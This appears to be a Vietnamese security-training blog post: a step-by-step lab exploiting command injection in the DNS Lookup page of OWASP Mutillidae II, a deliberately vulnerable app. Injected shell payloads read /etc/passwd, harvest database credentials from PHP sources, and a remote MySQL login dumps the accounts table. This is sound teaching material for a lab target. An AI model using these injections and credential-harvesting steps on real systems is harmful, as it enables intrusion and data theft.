Được tạo bởi Blogger.
Home » , » Bài Hướng Dẫn Mutillidae : Lesson 2 - Command Injection Database Interrogation

Bài Hướng Dẫn Mutillidae : Lesson 2 - Command Injection Database Interrogation

Written By Tuan.Dao.Duy on Chủ Nhật, 24 tháng 11, 2013 | 20:35

{ Command Injection Database Interrogation }

Section 0. Background Information
  • What Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is Command Injection?
    • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
  • What is Fuzzing?
    • Fuzz testing or fuzzing is a software testing technique that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems.
  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
      • Note: Remote database access has been turned to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
  • Lab Notes
    • In this lab we will do the following:
      1. Exploit a command injection/execution fuzzing vulnerability.
      2. Operating System Reconnaissance
      3. Application home directory Reconnaissance
      4. Database Reconnaissance
      5. Encoding PHP Script to view contents
      6. Remotely connecting to database
  • Legal Disclaimer  - không áp dụng các bài hướng dẫn trên hệ thống không có thẩm quyền
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

Section 2. Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine
  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

Section 4. Configure BackTrack Virtual Machine Settings
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

Section 5. Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 6. Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).
Section 7. Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 8. Basic Command Execution Testing
  1. Go to DNS Lookup
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
  2. Test DNS Lookup
    • Notes (FYI):
      • DNS Lookup on the surface is design to do just that,,, provide a DNS Lookup.
    • Instructions:
      1. Hostname/IP: www.cnn.com
      2. Click the Lookup DNS button
      3. View your Results
  3. Test DNS Lookup Vulnerability
    • Notes (FYI):
      • Now we will test a security vulnerable that will let us append a Unix/Linux command to the end of the hostname we are looking up.
      • The procedure of appending a ";" after what the application expects, is called command fuzzing.
      • Below you will run the "uname -a" command  
    • Instructions:
      1. Hostname/IP: www.cnn.com; uname -a
      2. Click the Lookup DNS button
      3. View your Results
  4. Perform Reconnaissance
    • Notes (FYI):
      • Don't you think it would be nice to know where there particular web page application is running from?
      • Now we are going to run the "pwd" to show us the current working directory.
      • Also, notice in the Address Bar that the application is called dns-lookup.php  
    • Instructions:
      1. Hostname/IP: www.cnn.com; pwd
      2. Click the Lookup DNS button
      3. View your Results
      4. Notice that dns-lookup.php is the vulnerable program.
  5. Interrogate the dns-lookup.php application
    • Notes (FYI):
      • Just for grins, let's see if we can find the line of code where PHP is executing a system call.
      • I will use the xargs command to search, using egrep, for the following strings: exec OR system OR virtual.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'
      2. Click the Lookup DNS button
      3. View your Results
        • Notice there is a function called shell_exec(), that is actually executing the Linux command "nslookup".

Section 9. Database Reconnaissance
  1. Discover the Database Engine using the /etc/passwd file
    • Notes (FYI):
      • Let's search the /etc/passwd file for the following strings: postgres, sql, db2 and ora.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'
      2. Click the Lookup DNS button
      3. View your Results
        • MySQL is the database engine
  2. Discover the Database Engine using the "ps" command
    • Notes (FYI):
      • Let's use the "ps" command to search for the following process strings: postgres, sql, db2 and ora.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; ps -eaf | egrep -i '(postgres|sql|db2|ora)'
      2. Click the Lookup DNS button
      3. View your Results
        • The mysqld (daemon) is running.

Section 10. Database Interrogation
  1. List all php scripts
    • Notes (FYI):
      • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
      • But, first list all the php scripts.
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php"
      2. Click the Lookup DNS button
      3. View your Results
        • There is over 900+ php scripts.
  2. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" and "=".
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  3. Obtain password from search results
    • Notes (FYI):
      • Now you have to look closely to see the string password and the actual password "samurai".
    • Instructions:
      1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabasePassword = "samurai";
  4. Search MySQLHandler.php for the strings user OR login
    • Notes (FYI):
      • We now know that MySQLHandler.php contains the database password.
      • The only thing left it to obtain the database username for the password samarai.
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  5. Obtain username from search results
    • Instructions:
      1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabaseUsername = "root";
      2. Notice the MySQL connection method.
        • mMySQLConnection = new mysqli($HOSTNAME, $USERNAME, $SAMURAI_WTF_PASSWORD);
  6. Display MySQLHandler.php
    • Notes (FYI):
      • I guess I could have showed you this first, but good things come to those that wait.
      • It is possible to display the contents of the MySQLHandler.php program, by encoding the "<?php" and "?>" tags.  These tags tell apache to execute a php script.  To get around this problem and just display the text of the program, we change "<" to "&#60;" and ">" to "&#62;".
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  7. Viewing the Code
    • Notes (FYI):
      • Kind of scary,,, right?
      • Typically, you should never put authentication information into a program that accesses a database on the web.
    • Instructions:
      1. Database Username
        • static public $mMySQLDatabaseUsername = "root";
      2. Database Password
        • static public $mMySQLDatabasePassword = "samurai";
      3. Database Name
        • static public $mMySQLDatabaseName = "nowasp";
Section 11. Connect Remotely to MySQL
  1. On BackTrack, Open a Terminal
    • Instructions:
      1. Click on the Terminal Icon
  2. Connect Remotely to the Mutillidae Database
    • Notes (FYI):
      • Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. mysql -h 192.168.1.111 -uroot -psamurai
      2. show databases;
      3. use nowasp;
  3. Table Navigation
    • Notes (FYI):
      • Basically, we are looking for a table that contains username and password information.
      • In this case, the account table contain the authentication information.
    • Instructions:
      1. show tables;
      2. desc accounts;
  4. Display Account Table Records
    • Instructions:
      1. select * from accounts;
      2. quit;
Section 12. Proof of Lab
  1. Proof of Lab
    • Notes (FYI):
      • Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. cd
      2. mysql -h 192.168.1.111 -uroot -psamurai -e "select * from nowasp.accounts" > account.txt
      3. ls -l account.txt
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to website www.antoanthongtin.edu.vn
Share this article :

0 nhận xét:

Đăng nhận xét

 
Đăng Kí Học Trực Tuyến : Chương Trình Đào Tạo Security365 | Ethical Haking | SiSSP
Copyright © 2013. Công nghệ thông tin 365!! - All Rights Reserved
Web Master @ Nguyen Tran
Tech Support @ Bang Tran Ngoc